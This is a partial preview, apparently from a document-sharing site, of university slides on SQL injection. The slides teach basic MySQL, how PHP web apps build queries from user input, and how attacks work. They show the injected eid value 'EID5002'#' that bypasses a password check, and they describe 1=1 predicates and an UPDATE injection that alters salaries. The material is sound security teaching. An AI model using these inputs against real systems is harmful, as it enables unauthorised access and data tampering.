SQL Injection Attacks: Understanding the Threat and Prevention Techniques, Slides of Database Management Systems (DBMS)

A tutorial on SQL, explaining how SQL Injection attacks occur and the fundamental cause of the vulnerability. It also covers countermeasures such as filtering and encoding data, and the use of prepared statements for secure database interactions in web applications.

Typology: Slides

2021/2022

Uploaded on 09/27/2022

arwen
arwen 🇬🇧

4.3

(10)

248 documents

1 / 28

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
SQL Injection Attack
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff
pf12
pf13
pf14
pf15
pf16
pf17
pf18
pf19
pf1a
pf1b
pf1c

Partial preview of the text

Download SQL Injection Attacks: Understanding the Threat and Prevention Techniques and more Slides Database Management Systems (DBMS) in PDF only on Docsity!

SQL Injection Attack

Brief Tutorial of SQL

  • Log in to MySQL: We will use MySQL database, which is an open-source relational database management system. We can log in using the following command:
  • Create a Database : Inside MySQL, we can create multiple databases. “SHOW DATABSES” command can be used to list existing databases. We will create a new database called dbtest:

SQL Tutorial: Insert a Row

  • We can use the INSERT INTO statement to insert a new record into a table :
  • Here, we insert a record into the “employee” table.
  • We do not specify a value of the ID column, as it will be automatically set by the database.

SQL Tutorial: SELECT Statement

  • The SELECT statement is the most common operation on databases
  • It retrieves information from a database Asks the database for all its records, including all the columns Asks the database only for Name, EID and Salary columns

SQL Tutorial: WHERE Clause

  • The first query returns a record that has EID5001 in EID field
  • The second query returns the records that satisfy either EID=‘EID5001’ or Name=‘David’

SQL Tutorial: WHERE Clause

  • If the condition is always True, then all the rows are affected by the SQL statement
  • This 1=1 predicate looks quite useless in real queries, but it will become useful in SQL Injection attacks

SQL Tutorial: Comments

MySQL supports three comment styles

  • Text from the # character to the end of line is treated as a comment
  • Text from the “--” to the end of line is treated as a comment.
  • Similar to C language, text between /* and */ is treated as a comment

Interacting with Database in Web Application

  • A typical web application consists of three major components:
  • SQL Injection attacks can cause damage to the database. As we notice in the figure, the users do not directly interact with the database but through a web server. If this channel is not implemented properly, malicious users can attack the database.

Getting Data from User

  • The request shown is an HTTP GET request, because the method field in the HTML code specified the get type
  • In GET requests, parameters are attached after the question mark in the URL
  • Each parameter has a name=value pair and are separated by “&”
  • In the case of HTTPS, the format would be similar but the data will be encrypted
  • Once this request reached the target PHP script the parameters inside the HTTP request will be saved to an array $_GET or $_POST. The following example shows a PHP script getting data from a GET request

How Web Applications Interact with Database

Connecting to MySQL Database

  • PHP program connects to the database server before conducting query on database using.
  • The code shown below uses new mysqli(…) along with its 4 arguments to create the database connection.

Launching SQL Injection Attacks

  • Everything provided by user will become part of the SQL statement. Is it possible for a user to change the meaning of the SQL statement?
  • The intention of the web app developer by the following is for the user to provide some data for the blank areas.
  • Assume that a user inputs a random string in the password entry and types “EID5002’#” in the eid entry. The SQL statement will become the following

Launching SQL Injection Attacks

  • Everything from the # sign to the end of line is considered as comment. The SQL statement will be equivalent to the following:
  • The above statement will return the name, salary and SSN of the employee whose EID is EID5002 even though the user doesn’t know the employee’s password. This is security breach.
  • Let’s see if a user can get all the records from the database assuming that we don’t know all the EID’s in the database.
  • We need to create a predicate for WHERE clause so that it is true for all records.

Modify Database

  • If the statement is UPDATE or INSERT INTO, we will have chance to change the database.
  • Consider the form created for changing passwords. It asks users to fill in three pieces of information, EID, old password and new password.
  • When Submit button is clicked, an HTTP POST request will be sent to the server-side script changepassword.php, which uses an UPDATE statement to change the user’s password.

Modify Database

  • Let us assume that Alice (EID5000) is not satisfied with the salary she gets. She would like to increase her own salary using the SQL injection vulnerability. She would type her own EID and old password. The following will be typed into the “New Password” box :
  • By typing the above string in “New Password” box, we get the UPDATE statement to set one more attribute for us, the salary attribute. The SQL statement will now look as follows.
  • What if Alice doesn’t like Bob and would like to reduce Bob’s salary to 0, but she only knows Bob’s EID (eid5001), not his password. How can she execute the attack?